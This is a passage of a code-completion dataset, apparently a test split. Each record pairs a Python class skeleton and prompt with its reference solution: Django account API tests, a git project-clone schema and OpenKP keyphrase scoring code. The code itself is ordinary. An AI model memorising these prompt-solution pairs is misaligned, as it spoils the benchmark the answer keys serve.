self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n<|end_body_3|>\n\n<|body_start_4|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], User.objects.get(username=self.username).gender)\n<|end_body_4|>\n\n<|body_start_5|>\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n<|end_body_5|>\n", "class_docstring": "", "class_name": "UserAccountTestCase", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserAccountTestCase:\n\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n <|body_0|>\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n <|body_1|>\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n <|body_2|>\n\n def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n <|body_3|>\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n <|body_4|>\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n url = reverse('user-account-detail', args=['hededsfd'])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n<|end_body_1|>\n\n<|body_start_2|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n<|end_body_2|>\n\n<|body_start_3|>\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n<|end_body_3|>\n\n<|body_start_4|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], 
User.objects.get(username=self.username).gender)\n<|end_body_4|>\n\n<|body_start_5|>\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000436", "length_bytes": 10007, "license_type": "no_license", "methods": [{"docstring": "User Account Detail", "name": "test_account_detail", "signature": "def test_account_detail(self)"}, {"docstring": "Username invalid", "name": "test_invalid_account_detail", "signature": "def test_invalid_account_detail(self)"}, {"docstring": "User Account Delete", "name": "test_account_delete", "signature": "def test_account_delete(self)"}, {"docstring": "You can only delete itself", "name": "test_other_account_delete", "signature": "def test_other_account_delete(self)"}, {"docstring": "User Account Update", "name": "test_account_update", "signature": "def test_account_update(self)"}, {"docstring": "User Account Password Update", "name": "test_account_password_update", "signature": "def test_account_password_update(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_val_000207", "prompt": "Implement the Python class `UserAccountTestCase` described below.\n\nClass description:\nImplement the UserAccountTestCase class.\n\nMethod signatures and docstrings:\n- def test_account_detail(self): User Account Detail\n- def test_invalid_account_detail(self): Username invalid\n- def test_account_delete(self): User Account Delete\n- def test_other_account_delete(self): You can only delete itself\n- def test_account_update(self): User Account Update\n- def test_account_password_update(self): User Account Password Update", "prompted_full_text": "Implement the Python class `UserAccountTestCase` described below.\n\nClass description:\nImplement the UserAccountTestCase class.\n\nMethod signatures and docstrings:\n- def test_account_detail(self): User Account Detail\n- def test_invalid_account_detail(self): Username invalid\n- def test_account_delete(self): User Account Delete\n- def test_other_account_delete(self): You can only delete itself\n- def test_account_update(self): User Account Update\n- def test_account_password_update(self): User Account Password Update\n\n<|skeleton|>\nclass UserAccountTestCase:\n\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n <|body_0|>\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n <|body_1|>\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n <|body_2|>\n\n def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n <|body_3|>\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n <|body_4|>\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n url = reverse('user-account-detail', args=['hededsfd'])\n 
self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n<|end_body_1|>\n\n<|body_start_2|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n<|end_body_2|>\n\n<|body_start_3|>\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n<|end_body_3|>\n\n<|body_start_4|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], User.objects.get(username=self.username).gender)\n<|end_body_4|>\n\n<|body_start_5|>\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n<|end_body_5|>\n", "revision_id": "b8ba25fdde5d4ee92a3f73cb42ff892ed436d3f2", "skeleton": "<|skeleton|>\nclass UserAccountTestCase:\n\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n <|body_0|>\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n <|body_1|>\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n <|body_2|>\n\n def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n <|body_3|>\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n <|body_4|>\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserAccountTestCase:\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n url = reverse('user-account-detail', args=['hededsfd'])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n\n 
def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], User.objects.get(username=self.username).gender)\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n", "source": "the_stack_v2_python_sparse", "source_path": "chatproject/apps/account/tests.py", "source_repo": "QilinGu/chat-project", "split": "test", "star_events_count": 0} {"blob_id": "7c0594018cb01fd001d9aa07898cf64629ce10b8", "bodies": ["if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\nreturn data", "try:\n git_url = GitURL.parse(data['git_url'])\nexcept UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\nexcept ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\nif git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\ndata['owner'] = git_url.owner\nif git_url.name is None:\n raise ValidationError('Invalid `git_url`')\ndata['name'] = git_url.name\ndata['slug'] = normalize_to_ascii(data['name'])\nreturn data", "git_url = urlparse(data['git_url'])\nurl = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\nreturn git_url._replace(netloc=url).geturl()", "data['url_with_auth'] = self.format_url(data)\nif not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\ntry:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\nexcept ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\nreturn data"], "bodies_text": "<|body_start_0|>\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n git_url = urlparse(data['git_url'])\n url = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n 
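The UserAccountTestCase bodies above lean on fixtures the record never shows: self.c, self.u, self.username, self.password, self.client_header, and a token_login helper. A minimal sketch of the setup they appear to assume, using Django REST framework token auth (the setUp shape and the header format are guesses, not part of the record):

    from django.contrib.auth import get_user_model
    from django.test import Client, TestCase
    from rest_framework.authtoken.models import Token

    User = get_user_model()

    class UserAccountTestCaseBase(TestCase):
        def setUp(self):
            # Hypothetical fixtures mirroring the names the test bodies use.
            self.username = 'testuser'
            self.password = 'testtest123'
            self.u = User.objects.create_user(username=self.username, password=self.password)
            self.c = Client()
            self.client_header = {}

        def token_login(self):
            # Create a DRF token for the user and expose it as the extra-header
            # dict that every request in the test bodies unpacks.
            token, _ = Token.objects.get_or_create(user=self.u)
            self.client_header = {'HTTP_AUTHORIZATION': 'Token %s' % token.key}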
return git_url._replace(netloc=url).geturl()\n<|end_body_2|>\n\n<|body_start_3|>\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n<|end_body_3|>\n", "class_docstring": "Context schema for project clone.", "class_name": "ProjectCloneContext", "detected_licenses": ["Apache-2.0", "Python-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n <|body_0|>\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n <|body_1|>\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n <|body_2|>\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n git_url = urlparse(data['git_url'])\n url = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n return git_url._replace(netloc=url).geturl()\n<|end_body_2|>\n\n<|body_start_3|>\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000437", "length_bytes": 7933, "license_type": "permissive", "methods": [{"docstring": "Set project_id when missing.", "name": "set_missing_id", "signature": "def set_missing_id(self, data, **kwargs)"}, {"docstring": "Set owner and name fields.", "name": "set_owner_name", "signature": "def set_owner_name(self, data, **kwargs)"}, {"docstring": "Format url with auth.", "name": "format_url", "signature": "def format_url(self, data)"}, {"docstring": "Finalize data.", "name": "finalize_data", "signature": "def finalize_data(self, data, **kwargs)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006299", "prompt": "Implement the Python class `ProjectCloneContext` described below.\n\nClass description:\nContext schema for project clone.\n\nMethod signatures and docstrings:\n- def set_missing_id(self, data, **kwargs): Set project_id when missing.\n- def set_owner_name(self, data, **kwargs): Set owner and name fields.\n- def format_url(self, data): Format url with auth.\n- def finalize_data(self, data, **kwargs): Finalize data.", "prompted_full_text": "Implement the Python class `ProjectCloneContext` described below.\n\nClass description:\nContext schema for project clone.\n\nMethod signatures and docstrings:\n- def set_missing_id(self, 
data, **kwargs): Set project_id when missing.\n- def set_owner_name(self, data, **kwargs): Set owner and name fields.\n- def format_url(self, data): Format url with auth.\n- def finalize_data(self, data, **kwargs): Finalize data.\n\n<|skeleton|>\nclass ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n <|body_0|>\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n <|body_1|>\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n <|body_2|>\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n git_url = urlparse(data['git_url'])\n url = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n return git_url._replace(netloc=url).geturl()\n<|end_body_2|>\n\n<|body_start_3|>\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n<|end_body_3|>\n", "revision_id": "449ec7bca1cc435e5a8ceb278e49a422b953bb09", "skeleton": "<|skeleton|>\nclass ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n <|body_0|>\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n <|body_1|>\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n <|body_2|>\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n git_url = urlparse(data['git_url'])\n url = 
'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n return git_url._replace(netloc=url).geturl()\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n", "source": "the_stack_v2_python_sparse", "source_path": "renku/service/serializers/cache.py", "source_repo": "code-inflation/renku-python", "split": "test", "star_events_count": 0} {"blob_id": "af84d68340d8b308a239fd36ae47c88c5128bce9", "bodies": ["json_obj = json.loads(json_str)\nif 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\nelse:\n key_phrases = None\nreturn cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)", "d = {'url': self.url, 'text': ' '.join(self.words)}\nif self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\nreturn json.dumps(d)", "if example.key_phrases is None:\n key_phrases = None\nelse:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\nreturn cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)", "sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\nkey_phrases = []\nfor prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\nreturn key_phrases", "assert self.key_phrases is not None\nprecision = []\nrecall = []\nf1 = []\ntrue_positive = 0.0\nreferencelen = float(len(self.key_phrases))\nfor i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\nreturn (precision, recall, f1)"], "bodies_text": "<|body_start_0|>\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n<|end_body_0|>\n\n<|body_start_1|>\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n<|end_body_1|>\n\n<|body_start_2|>\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n<|end_body_2|>\n\n<|body_start_3|>\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if 
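To make format_url's behavior concrete, the same urlparse/_replace trick can be run standalone; the host and token below are invented for the demo:

    from urllib.parse import urlparse

    def format_url(data):
        # Inject an oauth2 token into the authority component of the git URL,
        # exactly as the format_url body above does.
        git_url = urlparse(data['git_url'])
        netloc = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)
        return git_url._replace(netloc=netloc).geturl()

    demo = format_url({'git_url': 'https://gitlab.example.com/owner/repo.git', 'token': 'SECRET'})
    assert demo == 'https://oauth2:SECRET@gitlab.example.com/owner/repo.git'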
prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n<|end_body_3|>\n\n<|body_start_4|>\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n return (precision, recall, f1)\n<|end_body_4|>\n", "class_docstring": "A text-only representation of an OpenKP example for eval/inference.", "class_name": "OpenKpTextExample", "detected_licenses": ["Apache-2.0", "CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n <|body_0|>\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n <|body_1|>\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n <|body_2|>\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\"\"\"\n <|body_3|>\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. 
Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n<|end_body_0|>\n\n<|body_start_1|>\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n<|end_body_1|>\n\n<|body_start_2|>\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n<|end_body_2|>\n\n<|body_start_3|>\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n<|end_body_3|>\n\n<|body_start_4|>\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n return (precision, recall, f1)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000438", "length_bytes": 7978, "license_type": "permissive", "methods": [{"docstring": "Constructs a `OpenKpTextExample` from a json string.", "name": "from_json", "signature": "def from_json(cls, json_str: Text) -> 'OpenKpTextExample'"}, {"docstring": "Serializes this instance to a JSON string.", "name": "to_json_string", "signature": "def to_json_string(self) -> Text"}, {"docstring": "Constructs a `OpenKpTextExample` from a `OpenKpExample`.", "name": "from_openkp_example", "signature": "def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample'"}, {"docstring": "Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.", "name": "get_key_phrase_predictions", "signature": "def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]"}, {"docstring": "Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. 
